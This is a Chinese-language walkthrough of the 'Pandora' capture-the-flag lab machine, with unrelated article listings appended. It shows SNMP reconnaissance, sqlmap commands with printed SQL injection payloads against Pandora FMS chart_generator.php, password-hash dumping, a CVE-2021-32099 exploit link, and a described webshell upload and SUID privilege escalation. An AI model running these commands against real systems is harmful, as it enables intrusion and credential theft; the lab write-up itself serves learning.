Pandora

信息收集

使用nmap进行扫描，发现开放了ssh和web服务
在这里插入图片描述
访问web服务后，并且进行了目录扫描，并没有发现有价值的信息

切换一个思路，看看有没有子域名，结果也是落空

wfuzz -c -u "http://pandora.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hh 33560 -H "HOST:FUZZ.pandora.htb"

在这里插入图片描述
至此，我的思路断了。想了很久发现会不会信息收集的时候做得不够细，然后再去扫描UDP的端口服务，有发现新的突破口。目标主机开放了snmp服务，我们可以使用snmpwalk工具对snmp的信息进行更仔细地扫描。

nmap -sV -sC -A -sU -oN udp_result -top-ports=20 pandora.htb

注：-top-ports参数是扫描开放概率最高的 number 个端口，出现的概率需要参考 nmap-services 文件

在这里插入图片描述

snmpwalk -v 2c pandora.htb -c public > pandora.snmp

信息量比较大，需要我们一点点仔细地搜索，发现存在了账户和密码。
在这里插入图片描述

漏洞利用

我们尝试登录，发现还存在另一个用户matt，但是没有权限查看到user.txt文件，目测应该是要提权到matt用户权限上去
在这里插入图片描述
查看对应的端口服务时，发现本地运行了一个web服务

那么思路来了，我们可以利用端口转发技术，将目标机器的80端口转发到本机的80端口上进行访问。

ssh -L 80:127.0.0.1:80 daniel@pandora.htb

在这里插入图片描述
紧接着我们访问本机的80端口，发现是一个pandora的FMS框架搭建的web服务，并且版本是v7.0NG.742

在搜索引擎上搜到，存在SQL注入的可能性，并且在相对应的目录上存在SQL注入漏洞。

那么就使用SQLMAP进行尝试注入吧，结果显示真的存在GET注入，数据库类型为MySQL

sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --batch

在这里插入图片描述
查看数据库名、数据表等信息

sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora --tables_____H__                                                                                                                                       ___ ___[.]_____ ___ ___  {1.6#stable}                                                                                                             
|_ -| . [']     | .'| . |                                                                                                                          
|___|_  [.]_|_|_|__,|  _|                                                                                                                          |_|V...       |_|   https://sqlmap.org                                                                                                       [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 22:29:53 /2022-01-28/[22:29:54] [INFO] testing connection to the target URL
[22:29:54] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=6ehkvd19mc3...lt5pi9cq7a'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)Payload: session_id=1' AND 7308=(SELECT (CASE WHEN (7308=7308) THEN 7308 ELSE (SELECT 8935 UNION SELECT 7585) END))-- -Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: session_id=1' OR (SELECT 8665 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(8665=8665,1))),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aGWuType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: session_id=1' AND (SELECT 3440 FROM (SELECT(SLEEP(5)))OagF)-- HMIA
---
[22:29:54] [INFO] testing MySQL
[22:29:54] [INFO] confirming MySQL
[22:29:54] [WARNING] reflective value(s) found and filtering out
[22:29:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[22:29:54] [INFO] fetching tables for database: 'pandora'
Database: pandora
[178 tables]
+------------------------------------+
| taddress                           |
| taddress_agent                     |
| tagent_access                      |
| tagent_custom_data                 |
| tagent_custom_fields               |
| tagent_custom_fields_filter        |
| tagent_module_inventory            |
| tagent_module_log                  |
| tagent_repository                  |
| tagent_secondary_group             |
| tagente                            |
| tagente_datos                      |
| tagente_datos_inc                  |
| tagente_datos_inventory            |
| tagente_datos_log4x                |
| tagente_datos_string               |
| tagente_estado                     |
| tagente_modulo                     |
| talert_actions                     |
| talert_commands                    |
| talert_snmp                        |
| talert_snmp_action                 |
| talert_special_days                |
| talert_template_module_actions     |
| talert_template_modules            |
| talert_templates                   |
| tattachment                        |
| tautoconfig                        |
| tautoconfig_actions                |
| tautoconfig_rules                  |
| tcategory                          |
| tcluster                           |
| tcluster_agent                     |
| tcluster_item                      |
| tcollection                        |
| tconfig                            |
| tconfig_os                         |
| tcontainer                         |
| tcontainer_item                    |
| tcredential_store                  |
| tdashboard                         |
| tdatabase                          |
| tdeployment_hosts                  |
| tevent_alert                       |
| tevent_alert_action                |
| tevent_custom_field                |
| tevent_extended                    |
| tevent_filter                      |
| tevent_response                    |
| tevent_rule                        |
| tevento                            |
| textension_translate_string        |
| tfiles_repo                        |
| tfiles_repo_group                  |
| tgis_data_history                  |
| tgis_data_status                   |
| tgis_map                           |
| tgis_map_connection                |
| tgis_map_has_tgis_map_con          |
| tgis_map_layer                     |
| tgis_map_layer_groups              |
| tgis_map_layer_has_tagente         |
| tgraph                             |
| tgraph_source                      |
| tgraph_source_template             |
| tgraph_template                    |
| tgroup_stat                        |
| tgrupo                             |
| tincidencia                        |
| titem                              |
| tlanguage                          |
| tlayout                            |
| tlayout_data                       |
| tlayout_template                   |
| tlayout_template_data              |
| tlink                              |
| tlocal_component                   |
| tlog_graph_models                  |
| tmap                               |
| tmensajes                          |
| tmetaconsole_agent                 |
| tmetaconsole_agent_secondary_group |
| tmetaconsole_event                 |
| tmetaconsole_event_history         |
| tmetaconsole_setup                 |
| tmigration_module_queue            |
| tmigration_queue                   |
| tmodule                            |
| tmodule_group                      |
| tmodule_inventory                  |
| tmodule_relationship               |
| tmodule_synth                      |
| tnetflow_filter                    |
| tnetflow_report                    |
| tnetflow_report_content            |
| tnetwork_component                 |
| tnetwork_component_group           |
| tnetwork_map                       |
| tnetwork_matrix                    |
| tnetwork_profile                   |
| tnetwork_profile_component         |
| tnetworkmap_ent_rel_nodes          |
| tnetworkmap_enterprise             |
| tnetworkmap_enterprise_nodes       |
| tnews                              |
| tnota                              |
| tnotification_group                |
| tnotification_source               |
| tnotification_source_group         |
| tnotification_source_group_user    |
| tnotification_source_user          |
| tnotification_user                 |
| torigen                            |
| tpassword_history                  |
| tperfil                            |
| tphase                             |
| tplanned_downtime                  |
| tplanned_downtime_agents           |
| tplanned_downtime_modules          |
| tplugin                            |
| tpolicies                          |
| tpolicy_agents                     |
| tpolicy_alerts                     |
| tpolicy_alerts_actions             |
| tpolicy_collections                |
| tpolicy_groups                     |
| tpolicy_modules                    |
| tpolicy_modules_inventory          |
| tpolicy_plugins                    |
| tpolicy_queue                      |
| tprofile_view                      |
| tprovisioning                      |
| tprovisioning_rules                |
| trecon_script                      |
| trecon_task                        |
| trel_item                          |
| tremote_command                    |
| tremote_command_target             |
| treport                            |
| treport_content                    |
| treport_content_item               |
| treport_content_item_temp          |
| treport_content_sla_com_temp       |
| treport_content_sla_combined       |
| treport_content_template           |
| treport_custom_sql                 |
| treport_template                   |
| treset_pass                        |
| treset_pass_history                |
| tserver                            |
| tserver_export                     |
| tserver_export_data                |
| tservice                           |
| tservice_element                   |
| tsesion                            |
| tsesion_extended                   |
| tsessions_php                      |
| tskin                              |
| tsnmp_filter                       |
| ttag                               |
| ttag_module                        |
| ttag_policy_module                 |
| ttipo_modulo                       |
| ttransaction                       |
| ttrap                              |
| ttrap_custom_values                |
| tupdate                            |
| tupdate_journal                    |
| tupdate_package                    |
| tupdate_settings                   |
| tuser_double_auth                  |
| tuser_task                         |
| tuser_task_scheduled               |
| tusuario                           |
| tusuario_perfil                    |
| tvisual_console_elements_cache     |
| twidget                            |
| twidget_dashboard                  |
+------------------------------------+[22:29:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/127.0.0.1'[*] ending @ 22:29:54 /2022-01-28/

这里重点关注两个数据库tsessions_php和tpassword_history，分别对这两个数据表的字段内容进行注入分析。因为tsessions_php的字段内容比较多，这里不再赘述。主要分析的是后者的字段内容信息。
在这里插入图片描述

sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tpassword_history -C date_begin,date_end,id_pass,id_user,password --dump

得到了matt用户的hash值，但是很可惜并不能解密出对应的明文值信息。因此我们只能换一个思路了。
在这里插入图片描述

提权

继续在网上查阅资料发现，存在一个poc能直接使用admin账户进行登录后台，这是链接地址https://github.com/zjicmDarkWing/CVE-2021-32099
在这里插入图片描述
登录成功后，发现存在一个文件上传的点，这里我们可以上传webshell

随便点击一个目录，url上提示是images目录

上传webshell后，打开监听并获取反弹的shell

提权ROOT

获取到matt用户的权限后，我们的下一个目标就是最高权限了。首先我们先查看可执行的二进制文件都有哪些。最显眼的是/usr/bin/pandora_backup这个可执行文件目录，我们可以尝试执行它。

find / -type f -perm -u=s 2>/dev/null

在这里插入图片描述
但是报了权限不够的错误，并且不但权限不够，因此我们需要一个更加稳定的shell外壳。

由于我们并没有解密到matt用户的明文密码，因此我们只能手撕ssh连接了。
在这里插入图片描述
生成了id_rsa文件后，我们得再生成一个验证文件，并且全部都设置为可读可写权限，但是不能执行。

然后我们把id_rsa的内容保存在本地上

再次执行之前的备份命令时，发现执行成功了

然后我们的思路又来了，既然这个是个可执行的二进制文件，那么我们可以将root的shell路径写入到tar命令中，从而获取最高的权限。
在这里插入图片描述

在这里插入图片描述

总结

总的来说，这是一个难度适中的靶机，相信一开始获取snmp突破口那里已经死了一大部分人了，然后就是后面sql注入成功后但是却没法解密，所以这个靶机相当出色，比较考验漏洞复现的技能。

查看全文
如若内容造成侵权/违法违规/事实不符，请联系编程学习网邮箱：809451989@qq.com进行投诉反馈，一经查实，立即删除！

Photoshop插件--证件照--1寸裁剪--1寸排版--脚本开发--PS插件
文章目录1.插件界面2.关键代码2.1.1寸裁剪2.2.1寸排版3.作者寄语PS是一款栅格图像编辑软件，具有许多强大的功能，可以制作证件照，本文演示如何通过脚本实现1寸裁剪和1寸排版功能相关功能，展示从互联网收集而来的一个小插件&#xf…...
2024/4/7 18:42:04
Apache 记录请求响应时间日志
导读本文章向大家介绍Apache 记录请求响应时间日志，主要包括Apache 记录请求响应时间日志使用实例、应用技巧、基本知识点总结和需要注意事项，具有一定的参考价值，需要的朋友可以参考一下。官网介绍在Apache2的中文手册中，是这样…...
2024/4/20 17:40:38
Android 9，安卓开发项目实战
以机器学习为核心，打造更为智能的手机 Android 9 赋予手机强大的学习能力：系统能够根据用户在使用过程中展露的习惯与偏好，进行自我学习与适应 —— 从强劲续航到人性化应用推荐，Android 9 都能想您所想，保障持久流畅…...
2024/4/13 23:14:27
BGP第二次实验
BGP第二次实验一、题目要求。二、根据要求配置合适的ip地址。（具体过程省略） 配置代码为： IP ad *.*.*.* *网段有：172.16.0~7.0 24 。骨干的ip由 172.16.0.0 24 划分为 172.16.0.0 30，其他为R2~R7的环回网段。 …...
2024/4/7 18:42:01
2022 年终奖个税计算方法，看看你被多收割了多少
年终奖个税计算 def nzjgs(n):""":type n: float 年终奖总额:rtype: float 年终奖交税额"""tmp n/12if tmp < 3000:return n * 0.03if 3000 < tmp < 12000:return n * 0.1 - 210if 12000 < tmp < 25000:return n * 0.2 - 1410i…...
2024/4/13 23:14:47
格基约简：BKZ算法
欧几里得球（Euclidean ball） 半径RRR的nnn维球，它的体积为： Vn(R)Rn⋅πn/2Γ(n/21)Rn⋅Vn(1)V_n(R) R^n \cdot \frac{\pi^{n/2}}{\Gamma(n/2 1)} R^n \cdot V_n(1) Vn(R)Rn⋅Γ(n/21)πn/2Rn⋅Vn(1) 其中Γ(s)\Gamma(s…...
2024/4/13 23:14:47
Python爬虫——Scrapy中请求响应、crawlspider、middleware
目录一、Scapy中request基础知识requestresponse二、Scrapy中crawlspidercrawlspider的使用实际案例三、Scrapy中下载中间件概念如何激活中间件如何编写一个下载中间件作用示例一、Scapy中request 基础知识 request scrapy.Request(url, [callbackNone, methodGET, headersN…...
2024/4/29 2:51:30
decode_audio.c 解读
decode_audio.c 解读 ---------------------------------------- 1. pkt av_packet_alloc(); //分配一个报 2. codec avcodec_find_decoder(AV_CODEC_ID_AAC); //查找一种codec 3. parser av_parser_init(codec->id); //初始化parser, 针对某种codec的parser 4. c a…...
2024/4/19 5:42:34
Arduino 按键检测输入信号内部上拉与外部上拉使用方法
Arduino 按键检测输入信号内部上拉与外部上拉使用方法如果只是将Arduino 单片机从代码上做普通的输入信号来检测，也就是相当于IO口是一个浮空输入的状态，那么引脚的电平状态将是一个未知的状态，如果使用万用表去测量其引脚的电压是2V左右的一个电平状态。除了做模拟输入信号…...
2024/5/4 0:13:16
4个迭代，从批量交付到持续交付转型
导语忙不完的事情，解不完的bug，每次发版都得集体熬个大通宵。干得多，结果还不好。阿里内部某研发团队就正处在这样的漩涡之中。在这样的背景下，阿里云效敏捷教练团队受邀，和该研发团队一起，通过4个迭代…...
2024/4/19 14:25:55
Java_DOS原理/路径详解
相对路径就是一步一步来，绝对就是退回总部再走。...
2024/4/22 15:45:21
Flink（51）：Flink高级特性之广播状态（BroadcastState）
目录 0. 相关文章链接 1. BroadcastState介绍 2. 需求-实现配置动态更新 3. 编码步骤 4. 代码实现 0. 相关文章链接 Flink文章汇总 1. BroadcastState介绍在开发过程中，如果遇到需要下发/广播配置、规则等低吞吐事件流到下游所有 task 时，就可以…...
2024/4/13 23:15:28
Android 10手势导航的侧滑返回效果优化策略，34岁Android程序员裸辞
NavigationBarEdgePanel是一个自定义view，如下： public class NavigationBarEdgePanel extends View implements NavigationEdgeBackPlugin { … } 既然找到了地方，那就实现一下上下滑动吧。 2，实现上下移动默认的那个箭头…...
2024/4/13 23:15:18
二十、服务端单线程模式下性能瓶颈
二十、服务端单线程模式下性能瓶颈前言一、测试准备二、测试情况分析1、初步分析2、详细分析3、优化分析二、优化方向总结前言之前我们使用多线程优化了客户端的发送性能接来下，我们通过客户端的多线程高频发送来测试服务端单线程下的性能瓶颈一、测试准备服务…...
2024/4/13 23:15:43
Spring源码笔记
当用户发送请求咱这个项目是怎么个流程呢？ http的三次握手----？四次挥手？ 三次握手 ： 1.客户端发起一个要创建连接的数据包（SYN/seq）的请求发送给服务器 2.服务器端接收到客户端的请求，返回一…...
2024/4/13 23:15:28
王道机试：日期问题
KY19 今年的第几天？ 描述输入年、月、日，计算该天是本年的第几天。输入描述： 包括三个整数年(1<Y<3000)、月(1<M<12)、日(1<D<31)。输出描述： 输入可能有多组测试数据，对于每一组测试数据&#…...
2024/4/17 6:24:22
java项目-第57期强烈推荐版在线网上书店系统
java项目-第57期强烈推荐版在线网上书店系统 1、项目简述后台主要是springbootmybatisshirojsp(jsp已过时)…，前端界面主要使用bootstrap框架搭建，并使用了ueditor富文本编辑器、highcharts图表库系统划分与功能该系统分为前台展示和后台管理两大模块…...
2024/4/13 23:15:38
计算机毕业设计python+scrapy下的租房信息爬取与数据展示工具的设计与实现
运行环境环境：python 3.6.0 Anaconda custom 64bit 4.3.0 Pycharm x64 专业版 2018.1.2 Web strom x64 专业版 2018.1.3 scrapy 1.3.3 MongoDB 3.6 Django 2.0.5 Semantic UI 2.2.4 chrome 56.0.2924.87 高德地图 API 1.4.6（2018.4.18） 项…...
2024/4/13 23:15:53
npm卸载
npm uninstall...
2024/4/19 9:26:20
不认识OAK和DepthAI？OpenCV CEO亲自带你入门
Hello，大家好，这里是OAK中国，我是助手君。本期分享的内容来自OpenCV CEO写的专栏文章，首发于oakchina官网。这是OAK智能深度相机编程专栏的第一篇文章，OAK-D与OAK-D-Lite都是3D人工智能相机。 OpenCV CEO带你认识OAK智…...
2024/4/7 18:41:49

Pandora

信息收集

漏洞利用

提权

提权ROOT

总结

相关文章

最新文章